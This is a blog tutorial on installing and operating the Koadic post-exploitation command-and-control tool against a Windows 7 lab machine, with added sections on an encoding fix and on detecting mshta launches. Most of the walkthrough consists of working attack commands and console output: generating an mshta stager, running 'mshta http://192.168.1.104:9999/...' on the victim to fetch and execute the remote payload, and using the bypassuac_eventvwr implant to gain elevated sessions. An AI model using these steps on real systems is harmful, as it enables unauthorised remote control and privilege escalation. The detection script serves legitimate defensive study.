Installing and Using Koadic

Overview

Koadic is a post-exploitation tool that came out of DEFCON; it does most of its work through VBScript and JScript. Without further ado, on to the demo.

Environment

I prepared two virtual machines: a Kali box as the attacker and a 64-bit Windows 7 box as the victim.

Installation

Installation is simple: git clone https://github.com/zerosum0x0/koadic.git, then install the dependencies with cd koadic/ and pip install -r requirements.txt.

Usage

Run ./koadic

                            .
                           / \
     _                   _ | |
    | | _____   __ _  __| || |  ___
    | |/ / _ \ / _` |/ _` ||.| / __|
    |   / (o) | (_| | (_| ||.|| (__
    |_|\_\_^_/ \__,_|\__,_||:| \___|
                           |:|
                        ~\==8==/~
                            8
                            O

        -{ COM Command & Control }-
      Windows Post-Exploitation Tools
             Endless Intellect

            ~[ Version:  0x8 ]~
            ~[ Stagers:    4 ]~
            ~[ Implants:  29 ]~

(koadic: sta/js/mshta)# 

First we need to know a few of the tool's concepts:

  • Stagers are the kinds of payload you generate to run on the machine you are attacking
  • Implants are the operations you can perform once you control the machine

For the specific stagers and implants, see the project's GitHub page https://github.com/zerosum0x0/koadic

Next we enter use stager/js/mshta to select the mshta stager, then set the local IP and port to listen on. You can enter info to see which parameters need setting: set LHOST 192.168.1.104, set LPORT 9999, then run.

(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/BYhBU
[>] mshta http://192.168.1.104:9999/BYhBU

Because this is a post-exploitation tool, the assumption is that you can already execute one command on the machine you control. On the victim, run mshta http://192.168.1.104:9999/BYhBU; in my case I just opened a cmd window and ran it there. Next you hit a Python character-encoding pitfall and see the following error:

(koadic: sta/js/mshta)# ----------------------------------------
Exception happened during processing of request from ('192.168.1.110', 49159)
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
    self.handle()
  File "/root/koadic/core/handler.py", line 90, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle
    self.handle_one_request()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request
    method()
  File "/root/koadic/core/handler.py", line 169, in do_POST
    self.session.parse_user_info(data)
  File "/root/koadic/core/session.py", line 56, in parse_user_info
    data = data.decode().split("~~~")
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128)
----------------------------------------
[!] Zombie 0: Timed out.

The problem is the line UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128). You just need to switch the default character encoding to UTF-8. How? First quit the program, then open the following file: vim koadic

Add:

import sys
reload(sys)
sys.setdefaultencoding('utf-8')

The whole file then looks like this:

#!/usr/bin/env python

import sys
reload(sys)
sys.setdefaultencoding('utf-8')
# Copyright (c) 2016 - 2017 RiskSense, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use the software except in compliance with the License.
#
# You may obtain a copy of the License at:
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.

# Disclaimer:
# Usage of Koadic for attacking targets without prior mutual consent is illegal.
# It is the end user's responsibility to obey all applicable local, state,
# federal, and international laws. Developers assume no liability and are not
# responsible for any misuse or damage caused by this program.

__version_info__ = (0, 8)
__version__ = "x".join(map(str, __version_info__))
__license__ = "Apache 2.0"
__credits__ = ["zerosum0x0", "jmage", "TheNaterz", "aleph-naught-"]

if __name__ == "__main__":
    import core.shell

    banner = open("data/banner.txt", "rb").read().decode("unicode_escape")

    shell = core.shell.Shell(banner, __version__)
    shell.run()
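Why this fix works, and what a narrower fix looks like, as an added example that is not Koadic's own code: the check-in record the zombie posts carries the Chinese OS name "Windows 7 专业版" as UTF-8, and its first non-ASCII byte 0xe4 is exactly what the ASCII codec rejects. The field layout of the sample record is an assumption, constructed for the example from the fields visible in the zombies output.

```python
# Added example (not Koadic's own code): why the stager check-in crashed, and a decode that does not.
# Koadic 0x8's session.parse_user_info calls data.decode() with no codec; under Python 2 that means
# sys.getdefaultencoding(), i.e. ASCII, which is why setting the default encoding to UTF-8 fixes it.
# The first non-ASCII byte of the UTF-8 OS name "Windows 7 专业版" is 0xe4 (the start of 专).

# Constructed record modelled on the fields in the zombies output; the field order is an assumption.
SAMPLE = ("WIN-HK90RUM6L1B\\bboysoul~~~WIN-HK90RUM6L1B~~~Unknown~~~"
          "Microsoft Windows 7 专业版~~~64-bit").encode("utf-8")


def first_non_ascii(data):
    """Return (offset, byte value) of the first byte outside ASCII, or None."""
    for offset, value in enumerate(data):
        if value >= 0x80:
            return offset, value
    return None


def parse_user_info_ascii(data):
    """Mirrors the failing behaviour: decoding as ASCII raises on the first byte >= 0x80."""
    return data.decode("ascii").split("~~~")


def parse_user_info_utf8(data):
    """Hardened variant: explicit UTF-8; malformed input is replaced instead of crashing the handler."""
    return data.decode("utf-8", errors="replace").split("~~~")


def demo(data=SAMPLE):
    """Return ((failure offset, offending byte) under ASCII or None, fields under UTF-8)."""
    try:
        parse_user_info_ascii(data)
        failure = None
    except UnicodeDecodeError as err:
        failure = (err.start, data[err.start])
    return failure, parse_user_info_utf8(data)


if __name__ == "__main__":
    print(first_non_ascii(SAMPLE), demo())
```

A fix confined to session.py (decode with an explicit codec) avoids changing the interpreter-wide default encoding, which can mask other encoding bugs.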

After that, repeat the steps above and the error no longer appears:

                            .
                           / \
     _                   _ | |
    | | _____   __ _  __| || |  ___
    | |/ / _ \ / _` |/ _` ||.| / __|
    |   / (o) | (_| | (_| ||.|| (__
    |_|\_\_^_/ \__,_|\__,_||:| \___|
                           |:|
                        ~\==8==/~
                            8
                            O

        -{ COM Command & Control }-
      Windows Post-Exploitation Tools
             Endless Intellect

            ~[ Version:  0x8 ]~
            ~[ Stagers:    4 ]~
            ~[ Implants:  29 ]~

(koadic: sta/js/mshta)# use stager/js/mshta 
(koadic: sta/js/mshta)# set LHOST 192.168.1.104
[+] LHOST => 192.168.1.104
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/N435X
[>] mshta http://192.168.1.104:9999/N435X
[+] Zombie 0: Staging new connection (192.168.1.110)
[+] Zombie 0: WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版 
(koadic: sta/js/mshta)#
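From the defender's side, the stager one-liner is the observable: mshta.exe launched with an HTTP URL on its command line. As an added example that is not part of the original post, here is a small Python check over constructed process-creation log lines; the key=value format, field names and sample lines are assumptions sketched from Sysmon Event ID 1 fields, not real telemetry.

```python
# Added example (not part of the original post): flag process-creation events where mshta.exe is
# started with a URL on its command line, the shape of the Koadic stager one-liner shown above.
# The log format below is a constructed key=value sketch of Sysmon Event ID 1 fields, not real telemetry.
import re

SAMPLE_EVENTS = [
    'EventID=1 Image=C:\\Windows\\System32\\mshta.exe '
    'CommandLine="mshta http://192.168.1.104:9999/BYhBU" ParentImage=C:\\Windows\\System32\\cmd.exe',
    # A local .hta launched by an installer: mshta.exe, but no remote URL, so not flagged
    'EventID=1 Image=C:\\Windows\\System32\\mshta.exe '
    'CommandLine="mshta C:\\Vendor\\setup.hta" ParentImage=C:\\Vendor\\installer.exe',
    'EventID=1 Image=C:\\Windows\\System32\\notepad.exe '
    'CommandLine="notepad.exe" ParentImage=C:\\Windows\\explorer.exe',
]

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
REMOTE_URL = re.compile(r'https?://[^\s"]+', re.IGNORECASE)


def parse_event(line):
    """Split one key=value line into a dict, stripping quotes from quoted values."""
    return {key: value.strip('"') for key, value in FIELD.findall(line)}


def is_remote_mshta(event):
    """True when the image is mshta.exe and its command line carries an http(s) URL."""
    image = event.get("Image", "").lower()
    return image.endswith("\\mshta.exe") and REMOTE_URL.search(event.get("CommandLine", "")) is not None


def find_stager_launches(lines):
    """Return (parent image, URL) for every event that matches the remote-mshta pattern."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_remote_mshta(event):
            hits.append((event.get("ParentImage", ""), REMOTE_URL.search(event["CommandLine"]).group(0)))
    return hits


if __name__ == "__main__":
    for parent, url in find_stager_launches(SAMPLE_EVENTS):
        print("remote mshta launch:", url, "parent:", parent)
```

The same condition can be expressed against Windows Security event 4688 once command-line auditing is enabled, or as a Sysmon rule on Image and CommandLine.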

Next we escalate privileges, i.e. perform a UAC bypass.

Enter zombies to list the machines we control:

(koadic: sta/js/mshta)# zombies 

    ID   IP              STATUS  LAST SEEN       
    ---  ---------       ------- ------------    
    0    192.168.1.110   Alive   2017-11-25 21:27:46

Use "zombies ID" for detailed information about a session.

Enter zombies 0 to view detailed information about this machine:

(koadic: sta/js/mshta)# zombies 0

    ID:                     0                               
    Status:                 Alive                           
    Last Seen:              2017-11-25 21:28:42             

    IP:                     192.168.1.110                   
    User:                   WIN-HK90RUM6L1B\bboysoul        
    Hostname:               WIN-HK90RUM6L1B                 
    Primary DC:             Unknown                         
    OS:                     Microsoft Windows 7 专业版         
    OSArch:                 64-bit                          
    Elevated:               No                              

    User Agent:             Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
    Session Key:            f4d7735b8a9d45a5a74ed5a63a164421

    JOB  NAME                            STATUS  ERRNO   
    ---- ---------                       ------- ------- 

You can see that Elevated shows No, meaning we have not escalated privileges yet. Enter use implant/elevate/bypassuac_eventvwr and view the module's info:

(koadic: imp/ele/bypassuac_eventvwr)# info

    NAME        VALUE           REQ     DESCRIPTION     
    -----       ------------    ----    -------------   
    PAYLOAD                     yes     run payloads for a list
    ZOMBIE      ALL             yes     the zombie to target

Here we set PAYLOAD and ZOMBIE to 0: PAYLOAD 0 means no payload is used, and ZOMBIE 0 is the ID of the zombie. Then just run:

(koadic: imp/ele/bypassuac_eventvwr)# run
[*] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) created.
[+] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) completed.
[+] Zombie 1: Staging new connection (192.168.1.110)
[+] Zombie 1: WIN-HK90RUM6L1B\bboysoul* @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版 

Success. Note, however, that the program established a new connection to perform the bypass, so the original zombie connection still exists but is still the non-elevated user; the newly created connection is the elevated one. If you don't believe it, enter zombies and see whether an extra connection has appeared:

(koadic: imp/ele/bypassuac_eventvwr)# zombies 

    ID   IP              STATUS  LAST SEEN       
    ---  ---------       ------- ------------    
    0    192.168.1.110   Alive   2017-11-25 21:43:00
    1*   192.168.1.110   Alive   2017-11-25 21:43:00

Use "zombies ID" for detailed information about a session.

Look at zombie 1's information:

(koadic: imp/ele/bypassuac_eventvwr)# zombies 1

    ID:                     1                               
    Status:                 Alive                           
    Last Seen:              2017-11-25 21:45:35             

    IP:                     192.168.1.110                   
    User:                   WIN-HK90RUM6L1B\bboysoul*       
    Hostname:               WIN-HK90RUM6L1B                 
    Primary DC:             Unknown                         
    OS:                     Microsoft Windows 7 专业版         
    OSArch:                 64-bit                          
    Elevated:               YES!                            

    User Agent:             Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
    Session Key:            c42dec18786a47f2bc4ee023dc8f69bd

    JOB  NAME                            STATUS  ERRNO   
    ---- ---------                       ------- ------- 

The privilege escalation succeeded. Once a machine is elevated we can use all the modules under implant; explore the individual modules yourself.

Follow Bboysoul's blog at www.bboysoul.com. Have Fun
